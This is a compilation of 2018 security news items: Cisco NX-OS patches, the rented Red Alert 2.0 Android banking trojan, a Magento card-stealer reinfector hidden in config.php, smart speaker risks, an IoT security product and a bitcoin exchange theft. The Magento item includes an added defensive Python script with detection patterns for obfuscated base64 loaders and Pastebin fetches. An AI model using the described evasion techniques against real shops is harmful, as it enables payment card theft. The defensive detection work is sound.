A total of five Critical arbitrary code execution vulnerabilities were addressed with this set of security patches, impacting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The bugs can be exploited by unauthenticated, remote attackers to cause a buffer overflow, execute arbitrary code (as root, in some cases), cause a denial of service (DoS) condition, or read sensitive memory content on an affected device.

The bugs impact multiple devices, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, Firepower 4100 and Firepower 9300 products, UCS 6100 to UCS 6300 Series Fabric Interconnects, and MDS 9000 Series Multilayer Switches.

Cisco also addressed High risk vulnerabilities impacting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The issues affecting NX-OS include command injection in the CLI and NX-API, denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor, elevation of privilege in role-based access control (RBAC), remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature, DoS in the Border Gateway Protocol (BGP) implementation, and elevation of privilege in NX-API.

Flaws also affecting FXOS Software include an unauthorized administrator account in the write-erase feature, DoS conditions in the Discovery Protocol (formerly known as CDP) subsystem and the Cisco Fabric Services component, and arbitrary code execution in the Cisco Discovery Protocol component.

Issues affecting only FXOS Software include an arbitrary code execution vulnerability in the CLI parser and a denial of service bug in the web UI.

Additionally, Cisco patched DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

A path traversal vulnerability was resolved in the process of uploading new application images to the Cisco Firepower 4100 Series Next-Generation Firewall (NGFW) and Firepower 9300 Security Appliance.

As part of this set of security updates, Cisco also addressed 10 Medium risk flaws in TelePresence Video Communication Server (VCS) Expressway, Unified Communications Manager IM & Presence Service (formerly CUPS), NX-OS Software, NVIDIA TX1 BootROM, Meeting Server, Firepower Management Center, 5000 Series Enterprise Network Compute System and Unified Computing (UCS) E-Series Servers, and AnyConnect Secure Mobility Client for Windows Desktop.

Software updates were released for the vulnerable products. Cisco customers with valid licenses are advised to upgrade to an appropriate release. Details on the resolved vulnerabilities and the affected products and devices are available on Cisco’s website.


Red Alert 2.0 Android Trojan available for rent in the underground at $500 per Month
22.6.2018 securityaffairs Android

According to researchers at Trustwave, the source code of the Red Alert 2.0 Android Trojan is now available for rent on cybercrime underground forums at $500 per month.
The experts discovered the latest variant after receiving a malicious APK via email and analyzing it.

“It all started with a spam message, which curiously had an Android App attachment. The spam email vaguely claims that the attachment was a dating app for finding anonymous sex-acquaintances called SilverBox.” reads the analysis published by Trustwave.

“We Googled some of the strings from the decompiled source code and found this bot was known as RED ALERT v2.0 BOT and is being rented out for at least $200 for 7 days test usage, $500 for a month and up to $999 for 2 months.”

The Red Alert 2.0 Android Trojan was being distributed through spam messages. At the time of analysis, the sample was detected by 25 of the 59 anti-virus engines on VirusTotal.

The Red Alert 2.0 Android Trojan was first spotted in September by researchers at security firm SfyLabs; at that time it was being offered for rent on many dark web sites for $500 per month.

The Red Alert 2.0 Android banking malware was developed from scratch and has been offered for rent via many online hacking forums. The authors of the malware are continuously updating it, adding new features.


The malware implements a broad range of stealing abilities: it is capable of exfiltrating information from infected mobile devices, such as contact details and SMS messages. It is also able to block calls from banks, and it implements a backup C&C mechanism through Twitter.

C&C communications take place via HTTP POST requests to a specific URL; if the C&C server is not available, the malicious code receives instructions from the operator through a Twitter message.

The malware also displays an overlay on top of legitimate apps; at the time of its first discovery, experts observed around 60 HTML overlays for banking apps.

According to Trustwave, the authors have expanded this capability, and currently the Red Alert 2.0 Android Trojan is able to target more than 120 banks in Australia, Austria, Canada, the Czech Republic, Poland, Denmark, Germany, France, Lithuania, India, Italy, Ireland, Japan, New Zealand, Romania, Spain, Sweden, Turkey, the United Kingdom, and the United States.

The authors’ advert also claims that the malware is able to target popular payment systems (PayPal, Airbnb, Coinbase, Poker Stars, Neteller, Skrill, and Unocoin Bitcoin Wallet India) and includes CC+VBV grabbers for Amazon, eBay, LINE, GetTaxi, Snapchat, Viber, Instagram, Facebook, Skype, UBER, WeChat, and WhatsApp.

Red Alert 2.0 is able to intercept and send SMS messages, launch APKs and inject HTML, this latter feature could be customized on demand. The author claims to produce new updates every two weeks.

The malware uses a number of services to handle its life cycle and keep it running at all times, some of which are:

WatchDogService: sets timers to ensure that the malware is running periodically.
ControlService: registers the device bot and starts up the ReadCommandThread, which waits for instructions from the C&C server and ensures that the device stays connected to it.
BootReceiver: ensures all functionality is up and running when the device is rebooted. This boot receiver ensures that the watchdog service is run every 10 seconds or 30 seconds, depending on the version of the OS.
SmsReceiver: intercepts SMS messages.
Red Alert 2.0 also includes a UI module used to request permissions from the victims and to overlay templates received from the C&C server on top of other apps.


Below is a video published by the researchers that shows the malware in action:

Are you curious?

Well, you can rent the malware starting at $200 for 7 days, $500 for a month, or $999 for 2 months.

Let’s close with a consideration: spreading Android malware via spam messages is not an effective method, and, as the experts confirm, it is rare to see crooks distributing malicious Android apps this way.

“To wrap up, we had fun reverse engineering this Android malware and learned a lot. It was interesting to see APK malware being spammed via email, but we wonder how effective the strategy really is for the bad guys.” concludes Trustwave.

“The malware required the user to OK to install, and Android pops up plenty of warnings about permissions. Also, Google Play Protect was detecting this threat, so in order to get the malware installed on Android we also had to disable Play Protect. We haven’t seen any more samples being spammed, so perhaps the email campaign was not so successful after all.”


Magento credit card stealer Reinfector allows crooks to reinfect sites with malicious code
22.6.2018 securityaffairs
Virus

Cybercriminals used the ‘credit card stealer reinfector’ to reinfect the websites and continue to steal personal and financial data.
Researchers at Sucuri reported crooks are using a very simple evasion technique to reinfect Magento websites after their malicious code has been removed.

Cybercriminals have devised a method to hide the malicious code, the ‘credit card stealer reinfector’, used to reinfect the websites and continue to steal personal and financial data.

The credit card stealer reinfector is hidden inside the default configuration file (config.php) of Magento installs. Because this file is included by the main index.php, it is loaded with every page visited by users, which ensures that the malicious code is re-injected into multiple files of the website.

Researchers highlighted that the config.php file is automatically configured during the installation of the Magento instance and usually administrators or website owners don’t change it.

“This code is a prime candidate for infections once it is included right on the main index.php, loading at every page.” reads the analysis published by the experts.

“On the first block, we have a function called “patch” that writes content into a file (patching it). This function is then called to write externally obtained content into specific files related to the payment process or user control:

/app/code/core/Mage/Payment/Model/Method/Cc.php
/app/code/core/Mage/Payment/Model/Method/Abstract.php
/app/code/core/Mage/Customer/controllers/AccountController.php
/app/code/core/Mage/Customer/controllers/AddressController.php
/app/code/core/Mage/Admin/Model/Session.php
/app/code/core/Mage/Admin/Model/Config.php
/app/code/core/Mage/Checkout/Model/Type/Onepage.php
/app/code/core/Mage/Checkout/Model/Type/Abstract.php
The malicious code also obfuscates external links in a way that a simple variable replacement and base64 decoding can read it”

The malicious code was stored on Pastebin, a choice that allows attackers to remain under the radar.

Experts pointed out that the reinfector code they analyzed is able to bypass security scanners.

“The mechanism the attackers add “error_reporting(0);” is very interesting. It avoids any error leading to the discovery of the infection.” states the post.

The patch() function is used to inject the malicious code for stealing confidential information into Magento files. It takes 4 arguments: the path of a folder, the name of the file in that path that needs to be infected, a file size that is used to check whether it is necessary to reinfect the given file, a new file name to be created, and the remote URL from which the malicious code will be downloaded.

Experts noticed that the base64_decode() function is split in multiple parts to evade detection from security scanners.

“As a rule of thumb, on every Magento installation where a compromise is suspected to have taken place, the /includes/config.php should be verified quickly. We advise you to do it first thing. Many times, removing just the infection that you have a main concern about is not enough. You should always assume someone is out there ready to catch you off guard.” conclude the researchers.
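The advice above translates directly into a defender's check: keep a size and hash baseline of the core files the reinfector writes into, and scan includes/config.php for the constructs the analysis describes (error_reporting(0), a split base64_decode identifier, write calls, a Pastebin URL). The following script is an added example, not Sucuri's or Magento's code; the target file list is taken from the write-up, the "clean" and "infected" installs are constructed stubs so it runs offline, and the indicator list is an assumption based only on what the article reports.

```python
"""Integrity and indicator check for the Magento paths named in the Sucuri write-up."""
import hashlib
import re
import tempfile
from pathlib import Path

# Files the analysis says the patch() function writes into (paths from the write-up).
TARGET_FILES = [
    "app/code/core/Mage/Payment/Model/Method/Cc.php",
    "app/code/core/Mage/Payment/Model/Method/Abstract.php",
    "app/code/core/Mage/Customer/controllers/AccountController.php",
    "app/code/core/Mage/Customer/controllers/AddressController.php",
    "app/code/core/Mage/Admin/Model/Session.php",
    "app/code/core/Mage/Admin/Model/Config.php",
    "app/code/core/Mage/Checkout/Model/Type/Onepage.php",
    "app/code/core/Mage/Checkout/Model/Type/Abstract.php",
]

# PHP string concatenation between two literals: removing it collapses a split
# identifier such as 'base' . '64_de' . 'code' back into base64_decode.
CONCAT_RE = re.compile(r"""['"]\s*\.\s*['"]""")

# Indicators mentioned in the analysis (assumed heuristics, not a complete signature).
INDICATORS = {
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "base64_decode": re.compile(r"base64_decode"),
    "pastebin_url": re.compile(r"pastebin\.com", re.I),
    "file_write": re.compile(r"\b(file_put_contents|fwrite|fopen)\s*\("),
}


def sha256_file(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_baseline(root: Path) -> dict:
    """Record size and hash of each target file; run this on a known-clean install."""
    baseline = {}
    for rel in TARGET_FILES:
        p = root / rel
        if p.exists():
            baseline[rel] = {"size": p.stat().st_size, "sha256": sha256_file(p)}
    return baseline


def check_integrity(root: Path, baseline: dict) -> list:
    """Return target files that are missing or whose size or hash no longer matches."""
    changed = []
    for rel, rec in baseline.items():
        p = root / rel
        if not p.exists() or p.stat().st_size != rec["size"] or sha256_file(p) != rec["sha256"]:
            changed.append(rel)
    return changed


def scan_config(root: Path) -> list:
    """Flag indicators in includes/config.php after undoing string-concat splitting."""
    p = root / "includes/config.php"
    if not p.exists():
        return []
    text = CONCAT_RE.sub("", p.read_text(errors="replace"))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def make_sample_site(root: Path, infected: bool) -> None:
    """Constructed sample install: a stub for each target file plus includes/config.php."""
    for rel in TARGET_FILES:
        f = root / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text("<?php\n// stub standing in for the original core file\n")
    cfg = root / "includes/config.php"
    cfg.parent.mkdir(parents=True, exist_ok=True)
    cfg.write_text("<?php\ndefine('MAGENTO_ROOT', dirname(__DIR__));\n")
    if infected:
        # Inert constructed stand-in carrying only the indicators the write-up describes.
        cfg.write_text(cfg.read_text() + "error_reporting(0);\n$f = 'base' . '64_de' . 'code';\n")
        (root / TARGET_FILES[0]).write_text("<?php\n// stub\n// appended content\n")


def demo() -> tuple:
    """Baseline a clean tree, then re-check it after the constructed reinfection."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        make_sample_site(root, infected=False)
        baseline = build_baseline(root)
        make_sample_site(root, infected=True)
        return check_integrity(root, baseline), scan_config(root)


if __name__ == "__main__":
    changed_files, hits = demo()
    print("changed:", changed_files)
    print("config.php indicators:", hits)
```

On a real install, run build_baseline() right after a clean deployment and store the result off-host, then schedule check_integrity() and scan_config() against the live tree.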


Cisco security updates address five critical issues in NX-OS Software
22.6.2018 securityaffairs
Vulnerability

Cisco released security patches for more than 30 vulnerabilities, including five Critical arbitrary code execution issues affecting the NX-OS Software
Cisco released security patches for more than 30 vulnerabilities including five Critical arbitrary code execution issues affecting the NX-API feature of NX-OS Software (CVE-2018-0301) and the Fabric Services component of FXOS Software and NX-OS Software (CVE-2018-0308, CVE-2018-0304, CVE-2018-0314, and CVE-2018-0312).

The vulnerabilities can be remotely exploited by unauthenticated attackers to trigger a buffer overflow and execute arbitrary code (as root, in some circumstances), cause a denial of service (DoS) condition, or read sensitive memory content on vulnerable devices.

According to CISCO, many devices are affected by the critical vulnerabilities, including Nexus 3000 Series Switches to Nexus 9000 Series Switches in standalone NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules, UCS 6100 to UCS 6300 Series Fabric Interconnects, Firepower 4100 and Firepower 9300 products, and MDS 9000 Series Multilayer Switches.

Security updates also address High-risk vulnerabilities affecting NX-OS Software and FXOS Software, affecting Nexus 4000 Series Switch, Nexus 3000 and 9000 Series, and Firepower 4100 Series and Firepower 9300 Security Appliance.

The vulnerabilities affecting NX-OS include:

command-injections in the CLI and NX-API;
denial of service (DoS) in the Simple Network Management Protocol (SNMP) input packet processor;
elevation of privilege in role-based access control (RBAC);
remote code execution and DoS in the Internet Group Management Protocol (IGMP) Snooping feature;
DoS in the Border Gateway Protocol (BGP) implementation;
elevation of privilege in NX-API;

Security updates issued by Cisco also addressed DoS flaws in the SNMP feature of the Cisco Nexus 4000 Series Switch and in the implementation of a specific CLI command and the associated SNMP MIB for Cisco Nexus 3000 and 9000 Series Switches.

Further details on the vulnerabilities and the affected products are available on the Cisco Security Advisories and Alerts page.


6 Security Flaws in Smart Speakers You Need to Know About
22.6.2018 securityaffairs Security

Connectivity and functionality may offer us convenience, but, as with any new connected technology, smart speakers also come with security concerns.
How would you feel about having a device in your home that’s always listening to what’s going on, standing ready to record, process and store any information it receives? That might be a somewhat alarmist way of putting it, but it’s essentially what smart home speakers do.

Smart speakers offer audio playback but also feature internet connectivity and often a digital assistant, which dramatically expands their functionality.

With today’s smart speakers, you can search the internet, control other home automation devices, shop online, send text messages, schedule alarms and more.

This connectivity and functionality may offer us convenience, but as with any new connected technology, these speakers also come with security concerns. Any time you add a node to your network, you open yourself up to more potential vulnerabilities. Since smart home tech is still relatively new, it’s also bound to have bugs.

Although smart home companies work to fix these flaws as quickly as possible and want to ensure their devices are secure, there’s still always a chance you’ll run into security issues. Here are six potential risks you should be aware of.

Unexpected Activation
Although smart speakers are always listening since their microphones are continuously on, they don’t record or process anything they hear unless they detect their activation phrase first. For Google Home, this phrase is “OK, Google.” For an Amazon speaker, say “Alexa.”

There are several problems. The first is that the technology isn’t perfect yet, and it’s entirely possible that the device will mishear another phrase as its wake-up phrase. For example, an Oregon couple recently discovered that their Amazon Echo speaker had been recording them without their knowledge. Amazon blamed the mistake on the device mishearing something in a background conversation as “Alexa.”

Misheard Cues
Unfortunately, these misunderstandings can extend beyond just activation. After the Oregon family’s Echo recorded their conversation, it sent the recording to a random person on their contact list. They only knew about the incident because the person who received the recording contacted them and told them.

Amazon offered the same explanation for this part of the event. According to the company, the speaker misheard the background conversation as a whole string of commands, resulting in sending the discussion to the couple’s acquaintance. This situation suggests that these speakers’ listening skills might not be as advanced as they need to be to function properly.

Unwanted Interaction From Ads
Smart speakers may misunderstand cues and unexpectedly wake up, but people could also purposefully wake them without your permission. Once they do so, they could potentially gain access to some of your information.

Burger King demonstrated this vulnerability when it ran an ad that purposely activated Google Home speakers and prompted them to read off a description of the Whopper burger. Google reacted quickly and prevented the devices from responding. Burger King fired back by altering the ad so that it triggered the speakers again.

While this prank might be relatively harmless, people could also potentially activate your speaker without your permission, even by yelling through your front door or an open window. Because of this vulnerability, you should avoid using a smart speaker for things like unlocking your front door. You can also change the wake word and set up pins for specific features.


Hacks and Malware
Thus far, most of the reports of problems with smart speakers have revolved around unauthorized access or faulty functionality. The devices are certainly also vulnerable to malicious hacks.

Security experts in the tech realm have already discovered various susceptibilities, enabling companies to fix them. Hackers may at some point, however, find some of these vulnerabilities first. If they do, they may be able to access sensitive personal information.

To protect yourself from becoming a victim of a hacking incident, use hardware and software only from companies you trust. Also, use secure passwords, and change them often wherever you can.

Voice Hacks
Using smart speakers could also increase your vulnerability to voice hacks, a subset of identity theft in which someone obtains an audio recording of your voice and uses it to access your information. Once they have this recording, they use it to trick authentication systems into thinking they’re you. This hack is a potential way to get around smart speakers’ voice recognition capabilities.

Smart home speakers provide a potential goldmine of audio recordings that someone could use for voice hacking. If a bad actor manages to hack into the speaker or cloud service where your records get stored, they could use it to hack into various accounts of yours.

Storage of Your Data
The fact that some cloud service is storing these recordings may make users uncomfortable. These recordings may be used to personalize your experience, improve the smart assistant’s effectiveness, serve you ads or do a range of other things.

Luckily, you can delete these recordings if you’d like through your account settings. In addition, advocates have called for more transparency about how these companies use customer data.

Be Smart About Using Smart Speakers

All smart technology comes with security risks. That doesn’t necessarily mean we shouldn’t use it, but it does mean we should be careful about how we use it and take appropriate security measures.

If you choose to get a smart speaker, take the time to set up your security settings, and allow access only to people and companies you trust.


NanoLock Launches Platform to Protect IoT Devices From Production Through End-of-Life
21.6.2018 securityweek IoT 

Cybersecurity start-up NanoLock Security today announced a new lightweight security platform designed to add security into the small connected devices better known as the internet of things, rather than to overlay security around those devices.

This is security designed to safeguard small devices from the production line through to the end of life and beyond; to allow secure updates but to prevent hacking and tampering; and to ensure the integrity of data from the device outwards.

"The challenge for connected devices," co-founder and CEO Eran Fine told SecurityWeek, "is that about 90% have very low computing power -- and they are becoming the most vulnerable part of the ecosystem. How do you protect those low power, and low compute power devices where an attacker may have network or physical access? The attacker may come from the device-side, or the cloud-side, on the production line, or even at the end of life of the device. How do you protect the very low computing power device within a cost and performance structure that satisfies the connected device marketplace?"

He needed a solution or architecture that is CPU agnostic. "CPUs are hackable -- as Intel, ARM and AMD have recently demonstrated," he continued. "So we work on the assumption that CPUs are untrustworthy. Instead of developing security that uses the device's own CPU, we've created something that sits between the bus of the device and the non-volatile memory. This acts as a governing entity, and very aggressively allows or disallows other entities to read from or write to the non-volatile memory that holds the firmware, the boot image, and the critical applications."

This approach works by preventing overwriting, modification, manipulation, erasure and ransomware attacks on firmware, boot images, system parameters and critical applications in connected and IoT devices. Without any possible access to the firmware, hackers cannot gain access to the firmware and cannot, for example, recruit the device into the next big Mirai-style IoT botnet.

Three technologies lie at the heart of the architecture. OREN device-side embedded protection safeguards against attacks from the network and cloud, and even an attacker that has physical access to the device. FOTALock technology ensures the safe and trusted delivery of firmware-over-the-air (FOTA) updates, applications and critical parameters. Management of Things (MoT) controls and manages devices and includes features for monitoring device security, version management, attacks and alerts. MoT is deployed as a stand-alone solution or integrated into a customer's own security management platform.

Since NanoLock sits on the only data route into the device, and is placed there during manufacture or assembly, connected devices cannot be hacked. "Even if you are the device owner, even if you have all the highest privileges, even if you are on the production line and have access to the device -- the security camera or the router, or the ECU in a car -- you cannot write any malicious code into the firmware, into the memory holding the firmware. The only entity that can do this is someone who has created a root of trust and a root of integrity between the protected memory and the entity," explains Fine.

"The protected memory will always continue to protect because it has autonomous decision-making power -- it has its own tiny CPU, its own non-volatile memory, its own cryptographic engine. Even if you are hacking the CPU or hacking the cloud, this device will continue to protect itself and the cloud-to-device integrity." Furthermore, he continued, "Every device, on inception, registers itself, provisions itself, and protects itself in front of the cloud -- and once it does this, it is unbreakable and unclonable."

The result is device security from the production line through distribution, installation and use, to beyond end of life. NanoLock provides physical protection from rogue or corrupt employees on the production line or in the business, and from hackers during use. "I like that NanoLock is combining a cyber and cyber-physical approach to protect and manage devices from the production line through end of life," comments Chris Wilder, senior analyst at Moor Insights & Strategy.

Such an architecture cannot be sold to the end user for installation since it is an integral part of the connected device itself. "We don't sell to device users like Citibank or Bank of America," said Fine; "but we will sell to a car maker or a big manufacturer of security cameras, or very large cloud providers offering management of devices as a service. Our customers are the automotive OEMs, operators and device makers and to some extent the large systems integrators."

It's a top down, not a bottom up approach to distribution. "We have strategic relationships with the memory makers," he said. "We work with one in Taiwan, one in the US and one in Japan. This provides an early access to the device makers who spec us in to the manufacture."

"Connected cars, part of the IoT ecosystem, are an area where security vulnerabilities are life-critical," comments Takayuki Maruhashi, assistant director at Japan-based Techno Systems Research. "A solution like NanoLock's ensures the network of ECUs are fully protected and managed during operation and during the component update process. CPU protection is proven to be vulnerable and NanoLock's approach is the solution to this problem."

And it's not just business to business critical infrastructure scenarios, added Fine. "The unbreakable nature of the system also makes it attractive for military and intelligence purposes where the device needs to be protected even if it falls into the wrong hands."

Based in both Nitzanei Oz, Israel and New York, NanoLock Security was founded in 2016 by Eran Fine, Shlomo Oren and Erez Kreiner; and is another start-up ultimately born from the Israeli intelligence services conveyor belt. Kreiner was director of Israel's National Cyber Security Authority for more than five years, and was responsible for preventing cyber-attacks on Israel's critical infrastructures and assets.


Hackers Steal $30 Million From Top Seoul Bitcoin Exchange
21.6.2018 securityweek  Cryptocurrency

Hackers stole more than $30 million worth of cryptocurrencies from South Korea's top bitcoin exchange, sending the unit's price falling around the world on Wednesday.

The virtual currency was priced at $6,442 late afternoon in Seoul, down about 4.4 percent from 24 hours earlier, after the latest attack on Bithumb raised concerns over cryptocurrency security.

Hyper-wired South Korea has emerged as a hotbed of trading in virtual units, at one point accounting for some 20 percent of global bitcoin transactions -- about 10 times the country's share of the global economy.

Bithumb, which has more than 1 million customers, is the largest virtual currency exchange in the South.

"It has been confirmed that virtual currencies worth 35 billion won ($32 million) was stolen through late night yesterday (Tuesday) to early morning today," the exchange said in a statement.

All deposits and withdrawals were suspended indefinitely to "ensure security", it said, adding the losses would be covered from the firm's own reserves.

It was the second major attack on South Korean virtual currency exchanges in just 10 days, after hackers stole 40 billion won from Seoul-based Coinrail, which has suspended withdrawal and deposit services since then.